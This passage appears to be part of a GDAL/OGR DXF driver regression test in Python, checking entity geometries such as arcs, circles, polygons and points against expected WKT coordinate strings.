0,-5.76589518571785 -3.06105687442822 0,-5.69609619231285 -2.94016147153359 0,-5.61803398874989 -2.82442949541505 0,-5.53208888623796 -2.71442478062692 0,-5.4386796006773 -2.61068325908201 0,-5.33826121271772 -2.51371034904521 0,-5.23132295065132 -2.42397849278656 0,-5.11838580694149 -2.34192485488992 0,-5.0 -2.26794919243112 0,-4.87674229357816 -2.20241190740167 0,-4.74921318683182 -2.14563229086643 0,-4.61803398874989 -2.09788696740969 0,-4.48384379119934 -2.05940854744801 0,-4.34729635533386 -2.03038449397558 0,-4.20905692653531 -2.01095620926345 0,-4.069798993405 -2.00121834596181 0,-3.930201006595 -2.00121834596181 0,-3.79094307346469 -2.01095620926345 0,-3.65270364466614 -2.03038449397558 0,-3.51615620880067 -2.05940854744801 0,-3.38196601125011 -2.09788696740969 0,-3.25078681316818 -2.14563229086643 0,-3.12325770642185 -2.20241190740167 0,-3.0 -2.26794919243112 0,-2.88161419305851 -2.34192485488992 0,-2.76867704934868 -2.42397849278656 0,-2.66173878728228 -2.51371034904521 0,-2.5613203993227 -2.610683259082 0,-2.46791111376204 -2.71442478062692 0,-2.38196601125011 -2.82442949541505 0,-2.30390380768715 -2.94016147153359 0,-2.23410481428215 -3.06105687442822 0,-2.1729090847148 -3.1865267138484 0,-2.12061475842818 -3.31595971334866 0,-2.07747660812336 -3.448725288366 0,-2.04370479853239 -3.58417661836448 0,-2.01946386251686 -3.72165379807987 0,-2.00487189948035 -3.86048705251175 0,-2.0 -4.0 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):31
# EntityHandle (String) = 21E
# LINESTRING Z (-2 -4 -8e-16,-2.00487189948035 -4.06975647374412 -8.07462837322448e-16,-2.01946386251686 -4.13917310096007 -8.15863696347693e-16,-2.04370479853239 -4.20791169081776 -8.25161648935015e-16,-2.07747660812336 -4.275637355817 -8.35311396394036e-16,-2.12061475842818 -4.34202014332567 -8.46263490175385e-16,-2.1729090847148 -4.4067366430758 -8.5796457277906e-16,-2.23410481428215 -4.46947156278589 -8.70357637706804e-16,-2.30390380768715 -4.52991926423321 -8.83382307192036e-16,-2.38196601125011 -4.58778525229247 -8.96975126354258e-16,-2.46791111376204 -4.64278760968654 -9.11069872344859e-16,-2.5613203993227 -4.694658370459 -9.2559787697817e-16,-2.66173878728228 -4.74314482547739 -9.40488361275968e-16,-2.76867704934868 -4.78801075360672 -9.5566878029554e-16,-2.88161419305851 -4.82903757255504 -9.71065176561355e-16,-3.0 -4.86602540378444 -9.86602540378444e-16,-3.12325770642185 -4.89879404629917 -1.0022051752721e-15,-3.25078681316818 -4.92718385456679 -1.0177970667735e-15,-3.38196601125011 -4.95105651629515 -1.03330225275453e-15,-3.51615620880067 -4.970295726276 -1.04864519350767e-15,-3.65270364466614 -4.98480775301221 -1.06375113976783e-15,-3.79094307346469 -4.99452189536827 -1.0785464968833e-15,-3.930201006595 -4.9993908270191 -1.09295918336141e-15,-4.069798993405 -4.9993908270191 -1.10691898204241e-15,-4.20905692653531 -4.99452189536827 -1.12035788219036e-15,-4.34729635533386 -4.98480775301221 -1.13321041083461e-15,-4.48384379119934 -4.970295726276 -1.14541395174753e-15,-4.61803398874989 -4.95105651629515 -1.1569090505045e-15,-4.74921318683182 -4.92718385456679 -1.16763970413986e-15,-4.87674229357816 -4.89879404629917 -1.17755363398773e-15,-5.0 -4.86602540378444 -1.18660254037844e-15,-5.11838580694149 -4.82903757255504 -1.19474233794965e-15,-5.23132295065132 -4.78801075360672 -1.2019333704258e-15,-5.33826121271772 -4.74314482547739 -1.20814060381951e-15,-5.4386796006773 -4.694658370459 -1.21333379711363e-15,-5.53208888623796 -4.64278760968654 -1.21748764959245e-15,-5.61803398874989 -4.58778525229247 -1.22058192410424e-15,-5.69609619231285 -4.5299192642332 -1.22260154565461e-15,-5.76589518571785 -4.46947156278589 -1.22353667485037e-15,-5.8270909152852 -4.4067366430758 -1.2233827558361e-15,-5.87938524157182 -4.34202014332567 -1.22214053848975e-15,-5.92252339187664 -4.275637355817 -1.21981607476936e-15,-5.95629520146761 -4.20791169081776 -1.21642068922854e-15,-5.98053613748314 -4.13917310096007 -1.21197092384432e-15,-5.99512810051965 -4.06975647374412 -1.20648845742638e-15,-6 -4 -1.2e-15,-5.99512810051965 -3.93024352625587 -1.19253716267755e-15,
# -5.98053613748314 -3.86082689903993 -1.18413630365231e-15,-5.95629520146761 -3.79208830918224 -1.17483835106499e-15,-5.92252339187664 -3.724362644183 -1.16468860360596e-15,-5.87938524157182 -3.65797985667433 -1.15373650982461e-15,-5.8270909152852 -3.5932633569242 -1.14203542722094e-15,-5.76589518571785 -3.53052843721411 -1.1296423622932e-15,-5.69609619231285 -3.4700807357668 -1.11661769280796e-15,-5.61803398874989 -3.41221474770753 -1.10302487364574e-15,-5.53208888623796 -3.35721239031346 -1.08893012765514e-15,-5.4386796006773 -3.305341629541 -1.07440212302183e-15,-5.33826121271772 -3.25685517452261 -1.05951163872403e-15,-5.23132295065132 -3.21198924639328 -1.04433121970446e-15,-5.11838580694149 -3.17096242744496 -1.02893482343865e-15,-5.0 -3.13397459621556 -1.01339745962156e-15,-4.87674229357815 -3.10120595370083 -9.97794824727899e-16,-4.74921318683182 -3.07281614543321 -9.82202933226504e-16,-4.61803398874989 -3.04894348370485 -9.66697747245474e-16,-4.48384379119934 -3.029704273724 -9.51354806492334e-16,-4.34729635533386 -3.01519224698779 -9.36248860232165e-16,-4.20905692653531 -3.00547810463173 -9.21453503116703e-16,-4.069798993405 -3.0006091729809 -9.07040816638591e-16,-3.930201006595 -3.0006091729809 -8.9308101795759e-16,-3.79094307346469 -3.00547810463173 -8.79642117809642e-16,-3.65270364466614 -3.01519224698779 -8.66789589165393e-16,-3.51615620880066 -3.029704273724 -8.54586048252467e-16,-3.38196601125011 -3.04894348370485 -8.43090949495495e-16,-3.25078681316818 -3.07281614543321 -8.32360295860139e-16,-3.12325770642185 -3.10120595370083 -8.22446366012268e-16,-3.0 -3.13397459621556 -8.13397459621556e-16,-2.88161419305851 -3.17096242744496 -8.05257662050347e-16,-2.76867704934868 -3.21198924639328 -7.98066629574196e-16,-2.66173878728228 -3.25685517452261 -7.91859396180489e-16,-2.5613203993227 -3.305341629541 -7.8666620288637e-16,-2.46791111376204 -3.35721239031346 -7.82512350407551e-16,-2.38196601125011 -3.41221474770753 -7.79418075895763e-16,-2.30390380768715 -3.4700807357668 -7.77398454345394e-16,-2.23410481428215 -3.53052843721411 -7.76463325149626e-16,-2.1729090847148 -3.5932633569242 -7.766172441639e-16,-2.12061475842818 -3.65797985667433 -7.77859461510252e-16,-2.07747660812336 -3.724362644183 -7.80183925230636e-16,-2.04370479853239 -3.79208830918224 -7.83579310771463e-16,-2.01946386251686 -3.86082689903993 -7.88029076155679e-16,-2.00487189948035 -3.93024352625587 -7.93511542573623e-16,-2 -4 -8e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-2 -4 -8e-16,-2.00487189948035 -4.06975647374412 -8.07462837322448e-16,-2.01946386251686 -4.13917310096007 -8.15863696347693e-16,-2.04370479853239 -4.20791169081776 -8.25161648935015e-16,-2.07747660812336 -4.275637355817 -8.35311396394036e-16,-2.12061475842818 -4.34202014332567 -8.46263490175385e-16,-2.1729090847148 -4.4067366430758 -8.5796457277906e-16,-2.23410481428215 -4.46947156278589 -8.70357637706804e-16,-2.30390380768715 -4.52991926423321 -8.83382307192036e-16,-2.38196601125011 -4.58778525229247 -8.96975126354258e-16,-2.46791111376204 -4.64278760968654 -9.11069872344859e-16,-2.5613203993227 -4.694658370459 -9.2559787697817e-16,-2.66173878728228 -4.74314482547739 -9.40488361275968e-16,-2.76867704934868 -4.78801075360672 -9.5566878029554e-16,-2.88161419305851 -4.82903757255504 -9.71065176561355e-16,-3.0 -4.86602540378444 -9.86602540378444e-16,-3.12325770642185 -4.89879404629917 -1.0022051752721e-15,-3.25078681316818 -4.92718385456679 -1.0177970667735e-15,-3.38196601125011 -4.95105651629515 -1.03330225275453e-15,-3.51615620880067 -4.970295726276 -1.04864519350767e-15,-3.65270364466614 -4.98480775301221 -1.06375113976783e-15,-3.79094307346469 -4.99452189536827 -1.0785464968833e-15,-3.930201006595 -4.9993908270191 -1.09295918336141e-15,-4.069798993405 -4.9993908270191 -1.10691898204241e-15,-4.20905692653531 -4.99452189536827 -1.12035788219036e-15,-4.34729635533386 -4.98480775301221 -1.13321041083461e-15,-4.48384379119934 -4.970295726276 -1.14541395174753e-15,-4.61803398874989 -4.95105651629515 -1.1569090505045e-15,-4.74921318683182 -4.92718385456679 -1.16763970413986e-15,-4.87674229357816 -4.89879404629917 -1.17755363398773e-15,-5.0 -4.86602540378444 -1.18660254037844e-15,-5.11838580694149 -4.82903757255504 -1.19474233794965e-15,-5.23132295065132 -4.78801075360672 -1.2019333704258e-15,-5.33826121271772 -4.74314482547739 -1.20814060381951e-15,-5.4386796006773 -4.694658370459 -1.21333379711363e-15,-5.53208888623796 -4.64278760968654 -1.21748764959245e-15,-5.61803398874989 -4.58778525229247 -1.22058192410424e-15,-5.69609619231285 -4.5299192642332 -1.22260154565461e-15,-5.76589518571785 -4.46947156278589 -1.22353667485037e-15,-5.8270909152852 -4.4067366430758 -1.2233827558361e-15,-5.87938524157182 -4.34202014332567 -1.22214053848975e-15,-5.92252339187664 -4.275637355817 -1.21981607476936e-15,-5.95629520146761 -4.20791169081776 -1.21642068922854e-15,-5.98053613748314 -4.13917310096007 -1.21197092384432e-15,-5.99512810051965 -4.06975647374412 -1.20648845742638e-15,-6 -4 -1.2e-15,-5.99512810051965 -3.93024352625587 -1.19253716267755e-15,' + \
'-5.98053613748314 -3.86082689903993 -1.18413630365231e-15,-5.95629520146761 -3.79208830918224 -1.17483835106499e-15,-5.92252339187664 -3.724362644183 -1.16468860360596e-15,-5.87938524157182 -3.65797985667433 -1.15373650982461e-15,-5.8270909152852 -3.5932633569242 -1.14203542722094e-15,-5.76589518571785 -3.53052843721411 -1.1296423622932e-15,-5.69609619231285 -3.4700807357668 -1.11661769280796e-15,-5.61803398874989 -3.41221474770753 -1.10302487364574e-15,-5.53208888623796 -3.35721239031346 -1.08893012765514e-15,-5.4386796006773 -3.305341629541 -1.07440212302183e-15,-5.33826121271772 -3.25685517452261 -1.05951163872403e-15,-5.23132295065132 -3.21198924639328 -1.04433121970446e-15,-5.11838580694149 -3.17096242744496 -1.02893482343865e-15,-5.0 -3.13397459621556 -1.01339745962156e-15,-4.87674229357815 -3.10120595370083 -9.97794824727899e-16,-4.74921318683182 -3.07281614543321 -9.82202933226504e-16,-4.61803398874989 -3.04894348370485 -9.66697747245474e-16,-4.48384379119934 -3.029704273724 -9.51354806492334e-16,-4.34729635533386 -3.01519224698779 -9.36248860232165e-16,-4.20905692653531 -3.00547810463173 -9.21453503116703e-16,-4.069798993405 -3.0006091729809 -9.07040816638591e-16,-3.930201006595 -3.0006091729809 -8.9308101795759e-16,-3.79094307346469 -3.00547810463173 -8.79642117809642e-16,-3.65270364466614 -3.01519224698779 -8.66789589165393e-16,-3.51615620880066 -3.029704273724 -8.54586048252467e-16,-3.38196601125011 -3.04894348370485 -8.43090949495495e-16,-3.25078681316818 -3.07281614543321 -8.32360295860139e-16,-3.12325770642185 -3.10120595370083 -8.22446366012268e-16,-3.0 -3.13397459621556 -8.13397459621556e-16,-2.88161419305851 -3.17096242744496 -8.05257662050347e-16,-2.76867704934868 -3.21198924639328 -7.98066629574196e-16,-2.66173878728228 -3.25685517452261 -7.91859396180489e-16,-2.5613203993227 -3.305341629541 -7.8666620288637e-16,-2.46791111376204 -3.35721239031346 -7.82512350407551e-16,-2.38196601125011 -3.41221474770753 -7.79418075895763e-16,-2.30390380768715 -3.4700807357668 -7.77398454345394e-16,-2.23410481428215 -3.53052843721411 -7.76463325149626e-16,-2.1729090847148 -3.5932633569242 -7.766172441639e-16,-2.12061475842818 -3.65797985667433 -7.77859461510252e-16,-2.07747660812336 -3.724362644183 -7.80183925230636e-16,-2.04370479853239 -3.79208830918224 -7.83579310771463e-16,-2.01946386251686 -3.86082689903993 -7.88029076155679e-16,-2.00487189948035 -3.93024352625587 -7.93511542573623e-16,-2 -4 -8e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):32
# EntityHandle (String) = 21F
# LINESTRING Z (-2 -2 0,-1.96657794502105 -2.03582232791524 0,-1.93571660708646 -2.07387296203834 0,-1.90756413746468 -2.11396923855472 0,-1.88225568337755 -2.15591867344963 0,-1.85991273921989 -2.19951988653655 0,-1.84064256332004 -2.24456356819194 0,-1.8245376630414 -2.29083348415575 0,-1.81167535069652 -2.33810751357387 0,-1.80211737240583 -2.38615871529951 0,-1.79590961168258 -2.43475641733454 0,-1.79308186916688 -2.48366732418105 0,-1.79364771956639 -2.53265663678705 0,-1.79760444649032 -2.58148917971011 0,-1.80493305548955 -2.62993053008786 0,-1.81559836524041 -2.67774814299567 0,-1.8295491764342 -2.72471246778926 0,-1.84671851756181 -2.7705980500731 0,-1.86702396641357 -2.81518461400453 0,-1.89036804575079 -2.85825811973811 0,-1.91663869124976 -2.89961179093367 0,-1.94570978947168 -2.93904710739563 0,-1.97744178327594 -2.97637475807832 0,-2.01168234177068 -3.01141554988232 0,-2.04826709158413 -3.04400126787917 0,-2.08702040594658 -3.07397548283483 0,-2.12775624779472 -3.10119430215541 0,-2.1702790628511 -3.12552706065018 0,-2.2143847183914 -3.14685694779575 0,-2.25986148319297 -3.16508156849045 0,-2.30649104396024 -3.18011343460661 0,-2.35404955334774 -3.1918803849814 0,-2.40230870454951 -3.20032593182975 0,-2.45103682729644 -3.2054095319166 0,-2.5 -3.20710678118655 0,-2.54896317270356 -3.2054095319166 0,-2.59769129545049 -3.20032593182975 0,-2.64595044665226 -3.1918803849814 0,-2.69350895603976 -3.18011343460661 0,-2.74013851680703 -3.16508156849045 0,-2.7856152816086 -3.14685694779575 0,-2.8297209371489 -3.12552706065018 0,-2.87224375220528 -3.10119430215541 0,-2.91297959405342 -3.07397548283483 0,-2.95173290841587 -3.04400126787917 0,-2.98831765822932 -3.01141554988232 0,-3.02255821672406 -2.97637475807832 0,-3.05429021052832 -2.93904710739563 0,-3.08336130875024 -2.89961179093367 0,-3.10963195424921 -2.85825811973811 0,-3.13297603358643 -2.81518461400453 0,-3.15328148243819 -2.7705980500731 0,-3.1704508235658 -2.72471246778926 0,-3.18440163475959 -2.67774814299567 0,-3.19506694451045 -2.62993053008786 0,-3.20239555350968 -2.58148917971011 0,-3.20635228043361 -2.53265663678705 0,-3.20691813083312 -2.48366732418105 0,-3.20409038831742 -2.43475641733454 0,-3.19788262759417 -2.38615871529951 0,-3.18832464930348 -2.33810751357387 0,-3.1754623369586 -2.29083348415575 0,-3.15935743667996 -2.24456356819194 0,-3.14008726078011 -2.19951988653655 0,-3.11774431662245 -2.15591867344963 0,-3.09243586253532 -2.11396923855472 0,-3.06428339291354 -2.07387296203834 0,-3.03342205497895 -2.03582232791524 0,-3 -2 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-2 -2 0,-1.96657794502105 -2.03582232791524 0,-1.93571660708646 -2.07387296203834 0,-1.90756413746468 -2.11396923855472 0,-1.88225568337755 -2.15591867344963 0,-1.85991273921989 -2.19951988653655 0,-1.84064256332004 -2.24456356819194 0,-1.8245376630414 -2.29083348415575 0,-1.81167535069652 -2.33810751357387 0,-1.80211737240583 -2.38615871529951 0,-1.79590961168258 -2.43475641733454 0,-1.79308186916688 -2.48366732418105 0,-1.79364771956639 -2.53265663678705 0,-1.79760444649032 -2.58148917971011 0,-1.80493305548955 -2.62993053008786 0,-1.81559836524041 -2.67774814299567 0,-1.8295491764342 -2.72471246778926 0,-1.84671851756181 -2.7705980500731 0,-1.86702396641357 -2.81518461400453 0,-1.89036804575079 -2.85825811973811 0,-1.91663869124976 -2.89961179093367 0,-1.94570978947168 -2.93904710739563 0,-1.97744178327594 -2.97637475807832 0,-2.01168234177068 -3.01141554988232 0,-2.04826709158413 -3.04400126787917 0,-2.08702040594658 -3.07397548283483 0,-2.12775624779472 -3.10119430215541 0,-2.1702790628511 -3.12552706065018 0,-2.2143847183914 -3.14685694779575 0,-2.25986148319297 -3.16508156849045 0,-2.30649104396024 -3.18011343460661 0,-2.35404955334774 -3.1918803849814 0,-2.40230870454951 -3.20032593182975 0,-2.45103682729644 -3.2054095319166 0,-2.5 -3.20710678118655 0,-2.54896317270356 -3.2054095319166 0,-2.59769129545049 -3.20032593182975 0,-2.64595044665226 -3.1918803849814 0,-2.69350895603976 -3.18011343460661 0,-2.74013851680703 -3.16508156849045 0,-2.7856152816086 -3.14685694779575 0,-2.8297209371489 -3.12552706065018 0,-2.87224375220528 -3.10119430215541 0,-2.91297959405342 -3.07397548283483 0,-2.95173290841587 -3.04400126787917 0,-2.98831765822932 -3.01141554988232 0,-3.02255821672406 -2.97637475807832 0,-3.05429021052832 -2.93904710739563 0,-3.08336130875024 -2.89961179093367 0,-3.10963195424921 -2.85825811973811 0,-3.13297603358643 -2.81518461400453 0,-3.15328148243819 -2.7705980500731 0,-3.1704508235658 -2.72471246778926 0,-3.18440163475959 -2.67774814299567 0,-3.19506694451045 -2.62993053008786 0,-3.20239555350968 -2.58148917971011 0,-3.20635228043361 -2.53265663678705 0,-3.20691813083312 -2.48366732418105 0,-3.20409038831742 -2.43475641733454 0,-3.19788262759417 -2.38615871529951 0,-3.18832464930348 -2.33810751357387 0,-3.1754623369586 -2.29083348415575 0,-3.15935743667996 -2.24456356819194 0,-3.14008726078011 -2.19951988653655 0,-3.11774431662245 -2.15591867344963 0,-3.09243586253532 -2.11396923855472 0,-3.06428339291354 -2.07387296203834 0,-3.03342205497895 -2.03582232791524 0,-3 -2 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):33
# EntityHandle (String) = 220
# POLYGON Z ((-1 -2 -4e-16,-1 -3 -5e-16,-2 -3 -6e-16,-2 -2 -5e-16,-1 -2 -4e-16))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((-1 -2 -4e-16,-1 -3 -5e-16,-2 -3 -6e-16,-2 -2 -5e-16,-1 -2 -4e-16))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):34
# EntityHandle (String) = 221
# POLYGON ((-3 -4,-4 -4,-4 -3,-3 -3,-3 -4))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((-3 -4,-4 -4,-4 -3,-3 -3,-3 -4))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):35
# EntityHandle (String) = 223
# POLYGON ((-8 -8,-9 -8,-9 -9,-8 -9,-8 -8))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((-8 -8,-9 -8,-9 -9,-8 -9,-8 -8))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):36
# EntityHandle (String) = 224
# LINESTRING (-2 -2,-2.15384615384615 -2.15384615384615,-2.30769230769231 -2.30769230769231,-2.46153846153846 -2.46153846153846,-2.61538461538461 -2.61538461538461,-2.76923076923077 -2.76923076923077,-2.92307692307692 -2.92307692307692,-3.07692307692308 -3.07692307692308,-3.23076923076923 -3.23076923076923,-3.38461538461538 -3.38461538461538,-3.53846153846154 -3.53846153846154,-3.69230769230769 -3.69230769230769,-3.84615384615385 -3.84615384615385,-4 -4,-4.15384615384615 -4.15384615384615,-4.30769230769231 -4.30769230769231,-4.46153846153846 -4.46153846153846,-4.61538461538462 -4.61538461538462,-4.76923076923077 -4.76923076923077,-4.92307692307692 -4.92307692307692,-5.07692307692308 -5.07692307692308,-5.23076923076923 -5.23076923076923,-5.38461538461538 -5.38461538461538,-5.53846153846154 -5.53846153846154,-5.69230769230769 -5.69230769230769,-5.84615384615385 -5.84615384615385,-6.0 -6.0,-6.15384615384615 -6.15384615384615,-6.30769230769231 -6.30769230769231,-6.46153846153846 -6.46153846153846,-6.61538461538462 -6.61538461538462,-6.76923076923077 -6.76923076923077,-6.92307692307692 -6.92307692307692,-7.07692307692308 -7.07692307692308,-7.23076923076923 -7.23076923076923,-7.38461538461539 -7.38461538461539,-7.53846153846154 -7.53846153846154,-7.69230769230769 -7.69230769230769,-7.84615384615385 -7.84615384615385,-8 -8)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (-2 -2,-2.15384615384615 -2.15384615384615,-2.30769230769231 -2.30769230769231,-2.46153846153846 -2.46153846153846,-2.61538461538461 -2.61538461538461,-2.76923076923077 -2.76923076923077,-2.92307692307692 -2.92307692307692,-3.07692307692308 -3.07692307692308,-3.23076923076923 -3.23076923076923,-3.38461538461538 -3.38461538461538,-3.53846153846154 -3.53846153846154,-3.69230769230769 -3.69230769230769,-3.84615384615385 -3.84615384615385,-4 -4,-4.15384615384615 -4.15384615384615,-4.30769230769231 -4.30769230769231,-4.46153846153846 -4.46153846153846,-4.61538461538462 -4.61538461538462,-4.76923076923077 -4.76923076923077,-4.92307692307692 -4.92307692307692,-5.07692307692308 -5.07692307692308,-5.23076923076923 -5.23076923076923,-5.38461538461538 -5.38461538461538,-5.53846153846154 -5.53846153846154,-5.69230769230769 -5.69230769230769,-5.84615384615385 -5.84615384615385,-6.0 -6.0,-6.15384615384615 -6.15384615384615,-6.30769230769231 -6.30769230769231,-6.46153846153846 -6.46153846153846,-6.61538461538462 -6.61538461538462,-6.76923076923077 -6.76923076923077,-6.92307692307692 -6.92307692307692,-7.07692307692308 -7.07692307692308,-7.23076923076923 -7.23076923076923,-7.38461538461539 -7.38461538461539,-7.53846153846154 -7.53846153846154,-7.69230769230769 -7.69230769230769,-7.84615384615385 -7.84615384615385,-8 -8)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):37
# EntityHandle (String) = 225
# LINESTRING (-8 -1,-7.62837370825536 -0.987348067229724,-7.25775889681215 -0.975707614760869,-6.88916704597178 -0.966090122894857,-6.52360963603567 -0.959507071933107,-6.16209814730525 -0.956969942177043,-5.80564406008193 -0.959490213928084,-5.45525885466714 -0.968079367487651,-5.11195401136229 -0.983748883157167,-4.77674101046882 -1.00751024123805,-4.45063133228814 -1.04037492203173,-4.13463645712167 -1.08335440583961,-3.82976786527082 -1.13746017296313,-3.53703703703704 -1.2037037037037,-3.25745545272173 -1.28309647836275,-2.99203459262631 -1.37664997724169,-2.74178593705221 -1.48537568064195,-2.50772096630085 -1.61028506886495,-2.29085116067365 -1.75238962221211,-2.09218800047203 -1.91270082098484,-1.91270082098485 -2.09218800047202,-1.75238962221211 -2.29085116067364,-1.61028506886495 -2.50772096630085,-1.48537568064195 -2.74178593705221,-1.37664997724169 -2.99203459262631,-1.28309647836275 -3.25745545272172,-1.2037037037037 -3.53703703703703,-1.13746017296313 -3.82976786527082,-1.08335440583961 -4.13463645712166,-1.04037492203173 -4.45063133228814,-1.00751024123805 -4.77674101046882,-0.983748883157167 -5.11195401136229,-0.968079367487652 -5.45525885466714,-0.959490213928084 -5.80564406008193,-0.956969942177043 -6.16209814730525,-0.959507071933108 -6.52360963603567,-0.966090122894857 -6.88916704597178,-0.975707614760869 -7.25775889681216,-0.987348067229724 -7.62837370825537,-1 -8)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (-8 -1,-7.62837370825536 -0.987348067229724,-7.25775889681215 -0.975707614760869,-6.88916704597178 -0.966090122894857,-6.52360963603567 -0.959507071933107,-6.16209814730525 -0.956969942177043,-5.80564406008193 -0.959490213928084,-5.45525885466714 -0.968079367487651,-5.11195401136229 -0.983748883157167,-4.77674101046882 -1.00751024123805,-4.45063133228814 -1.04037492203173,-4.13463645712167 -1.08335440583961,-3.82976786527082 -1.13746017296313,-3.53703703703704 -1.2037037037037,-3.25745545272173 -1.28309647836275,-2.99203459262631 -1.37664997724169,-2.74178593705221 -1.48537568064195,-2.50772096630085 -1.61028506886495,-2.29085116067365 -1.75238962221211,-2.09218800047203 -1.91270082098484,-1.91270082098485 -2.09218800047202,-1.75238962221211 -2.29085116067364,-1.61028506886495 -2.50772096630085,-1.48537568064195 -2.74178593705221,-1.37664997724169 -2.99203459262631,-1.28309647836275 -3.25745545272172,-1.2037037037037 -3.53703703703703,-1.13746017296313 -3.82976786527082,-1.08335440583961 -4.13463645712166,-1.04037492203173 -4.45063133228814,-1.00751024123805 -4.77674101046882,-0.983748883157167 -5.11195401136229,-0.968079367487652 -5.45525885466714,-0.959490213928084 -5.80564406008193,-0.956969942177043 -6.16209814730525,-0.959507071933108 -6.52360963603567,-0.966090122894857 -6.88916704597178,-0.975707614760869 -7.25775889681216,-0.987348067229724 -7.62837370825537,-1 -8)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):38
# EntityHandle (String) = 226
# POINT Z (-7 -7 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (-7 -7 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):39
# EntityHandle (String) = 227
# POINT Z (4 -4 -5e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (4 -4 -5e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):40
# EntityHandle (String) = 228
# LINESTRING Z (0 0 0,1 -1 -1e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0 0 0,1 -1 -1e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):41
# EntityHandle (String) = 229
# LINESTRING (1 -1,2 -1,1 -2,1 -1)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (1 -1,2 -1,1 -2,1 -1)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):42
# EntityHandle (String) = 22A
# LINESTRING Z (1 -1 -1e-16,1 -2 -2e-16,2 -2 -2e-16,1 -1 -1e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (1 -1 -1e-16,1 -2 -2e-16,2 -2 -2e-16,1 -1 -1e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):43
# EntityHandle (String) = 22F
# LINESTRING Z (2 -4 -4e-16,2.00487189948035 -4.13951294748825 -4.13951294748825e-16,2.01946386251686 -4.27834620192013 -4.27834620192013e-16,2.04370479853239 -4.41582338163552 -4.41582338163552e-16,2.07747660812336 -4.551274711634 -4.551274711634e-16,2.12061475842818 -4.68404028665134 -4.68404028665134e-16,2.1729090847148 -4.8134732861516 -4.8134732861516e-16,2.23410481428215 -4.93894312557178 -4.93894312557178e-16,2.30390380768715 -5.05983852846641 -5.05983852846641e-16,2.38196601125011 -5.17557050458495 -5.17557050458495e-16,2.46791111376204 -5.28557521937308 -5.28557521937308e-16,2.5613203993227 -5.38931674091799 -5.38931674091799e-16,2.66173878728228 -5.48628965095479 -5.48628965095479e-16,2.76867704934868 -5.57602150721344 -5.57602150721344e-16,2.88161419305851 -5.65807514511008 -5.65807514511008e-16,3.0 -5.73205080756888 -5.73205080756888e-16,3.12325770642185 -5.79758809259833 -5.79758809259833e-16,3.25078681316818 -5.85436770913357 -5.85436770913357e-16,3.38196601125011 -5.90211303259031 -5.90211303259031e-16,3.51615620880066 -5.94059145255199 -5.94059145255199e-16,3.65270364466614 -5.96961550602442 -5.96961550602442e-16,3.79094307346469 -5.98904379073655 -5.98904379073655e-16,3.930201006595 -5.99878165403819 -5.99878165403819e-16,4.069798993405 -5.99878165403819 -5.99878165403819e-16,4.20905692653531 -5.98904379073655 -5.98904379073655e-16,4.34729635533386 -5.96961550602442 -5.96961550602442e-16,4.48384379119934 -5.94059145255199 -5.94059145255199e-16,4.61803398874989 -5.90211303259031 -5.90211303259031e-16,4.74921318683182 -5.85436770913357 -5.85436770913357e-16,4.87674229357815 -5.79758809259833 -5.79758809259833e-16,5.0 -5.73205080756888 -5.73205080756888e-16,5.11838580694149 -5.65807514511008 -5.65807514511008e-16,5.23132295065132 -5.57602150721344 -5.57602150721344e-16,5.33826121271772 -5.48628965095479 -5.48628965095479e-16,5.4386796006773 -5.38931674091799 -5.38931674091799e-16,5.53208888623796 -5.28557521937308 -5.28557521937308e-16,5.61803398874989 -5.17557050458495 -5.17557050458495e-16,5.69609619231285 -5.05983852846641 -5.05983852846641e-16,5.76589518571785 -4.93894312557178 -4.93894312557178e-16,5.8270909152852 -4.8134732861516 -4.8134732861516e-16,5.87938524157182 -4.68404028665134 -4.68404028665134e-16,5.92252339187664 -4.551274711634 -4.551274711634e-16,5.95629520146761 -4.41582338163552 -4.41582338163552e-16,5.98053613748314 -4.27834620192013 -4.27834620192013e-16,5.99512810051965 -4.13951294748825 -4.13951294748825e-16,6 -4 -4e-16,5.99512810051965 -3.86048705251175 -3.86048705251175e-16,5.98053613748314 -3.72165379807987 -3.72165379807987e-16,5.95629520146761 -3.58417661836448 -3.58417661836448e-16,5.92252339187664 -3.448725288366 -3.448725288366e-16,
